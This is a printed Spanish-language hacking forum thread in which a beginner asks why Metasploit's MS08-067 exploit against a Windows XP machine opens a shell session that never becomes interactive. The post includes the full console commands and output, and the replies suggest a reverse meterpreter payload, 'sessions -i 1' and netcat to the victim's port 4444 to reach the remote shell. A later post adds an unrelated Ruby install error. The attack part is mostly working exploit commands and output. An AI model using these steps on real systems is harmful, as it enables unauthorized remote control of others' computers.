Imprimir Página - Problema Metasploit

Título: Problema Metasploit
Publicado por: marcucho en 21 Julio 2010, 12:45 PM

Hola a todos.
Tengo un pequeño problema con metasploit, realizo los siguiente para obtener una shell

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.53
RHOST => 192.168.1.53
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.53 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The listen port
RHOST 192.168.1.53 no The target address

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

Dándome como resultado el siguiente:

Started bind handler
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 3 - lang:Spanish
Selected Target: Windows XP SP3 Spanish (NX)
Attempting to trigger the vulnerability...
Sending stage (240 bytes) to 192.168.1.53
Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010

Pero se queda hay no me aparece la shell, es decir,

Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.

Título: Re: Problema Metasploit
Publicado por: kamsky en 21 Julio 2010, 13:03 PM

haz un nmap al puerto 4444 al pc víctima a ver que dice...

Título: Re: Problema Metasploit
Publicado por: Søra en 21 Julio 2010, 13:21 PM

usa el payload reverse meterpreter tcp y luego sessions -l y veras la sesiones activas que sera una la que acabas de conseguir asi que sessions y el numero y ya esta la shell del meterpreter q aunq sea diferente tiene mas opciones por ejemplo upload para subir archivos....

Saludos Søra

Título: Re: Problema Metasploit
Publicado por: Debci en 21 Julio 2010, 17:35 PM

Porque aun no has mirado las sessiones?
Cuando las mires haz:

sessions -i (de interactuar xD) numSession

En tu caso quedaria algo asi:

Código [Seleccionar]


sessions -i 1

Y obtendrias la shell remota :)

Título: Re: Problema Metasploit
Publicado por: wACtOr en 21 Julio 2010, 17:37 PM

ummm

CitarPero se queda hay no me aparece la shell, es decir,

Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.

Ya tienes la shell. Por lo que veo estas usando ubuntu y tras lanzar el exploit te aparece:
C:\WINDOWS\System32>

Pues ya tienes la shell del pc victima :S

no??

Título: Re: Problema Metasploit
Publicado por: marcucho en 21 Julio 2010, 18:05 PM

Es que ese es el problema que se queda en blanco, no aparece esto:

C:\WINDOWS\system32>

Cuando da el ok que todo lo ha hecho bien, esto
--------------------------------------------------------------------------------------

*Started bind handler
*Automatically detecting the target...
*Fingerprint: Windows XP Service Pack 3 - lang:Spanish
*Selected Target: Windows XP SP3 Spanish (NX)
*Attempting to trigger the vulnerability...
*Sending stage (240 bytes) to 192.168.1.53
*Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010

-----------------------------------------------------------------------------------------------

Después debe tardar unos segundo o milésimas en aparece C:\WINDOWS\system32>
bueno pues a mi no me aparece, y yo me quedo esperando 10 minutos y no aparece, y cual es el problema que no puedo hacer:

sessions -i 1

porque tampoco aparece msf >, se queda en blanco, no se si es que da algún error interno que no muestra, se queda como colgado lo único que me queda es ctrl + c y claro cierra sesión.

Gracias a todos por contestar.

Título: Re: Problema Metasploit
Publicado por: Debci en 21 Julio 2010, 18:52 PM

prueba a hacer nc al 4444 de la victima y probablemente obtengas la shell :)

Saludos

Título: Re: Problema Metasploit
Publicado por: wACtOr en 21 Julio 2010, 18:57 PM

por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.

Título: Re: Problema Metasploit
Publicado por: Debci en 21 Julio 2010, 20:08 PM

Cita de: wACtOr en 21 Julio 2010, 18:57 PM
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.

Si no quieres muchos problemas prueba Backtrack4 xD

Saludos

Título: Re: Problema Metasploit
Publicado por: [L]ord [R]NA en 24 Julio 2010, 00:06 AM

Cita de: wACtOr en 21 Julio 2010, 18:57 PM
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.

+1, las veces que lo he instalado lo hago desde SVN

Título: Re: Problema Metasploit
Publicado por: snake_girls en 8 Mayo 2012, 02:38 AM

Hola disculpen por revivir este post pero tengo un problema similar, tengo backtrack 5 , normalmente me funcionaba bien el metasploit framework, luego que lo actualize me tira error cuando lo invoco con: msfconsole

/opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:14:in `require': no such file to load -- racket (LoadError)
   from /opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:14:in `<module:Ipv6>'
   from /opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:12:in `<module:Msf>'
   from /opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:5:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/core/exploit/mixins.rb:30:in `require'
   from /opt/framework3/msf3/lib/msf/core/exploit/mixins.rb:30:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:217:in `require'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:217:in `<class:Exploit>'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:29:in `<module:Msf>'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:4:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/core.rb:52:in `require'
   from /opt/framework3/msf3/lib/msf/core.rb:52:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/ui/console/driver.rb:1:in `require'
   from /opt/framework3/msf3/lib/msf/ui/console/driver.rb:1:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/ui/console.rb:10:in `require'
   from /opt/framework3/msf3/lib/msf/ui/console.rb:10:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/ui.rb:10:in `require'
   from /opt/framework3/msf3/lib/msf/ui.rb:10:in `<top (required)>'
   from /opt/framework3/msf3/msfconsole:118:in `require'
   from /opt/framework3/msf3/msfconsole:118:in `<main>'
root@bt:~#
me pueden orientar referente a este error? que puedo hacer... gracias

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: marcucho en 21 Julio 2010, 12:45 PM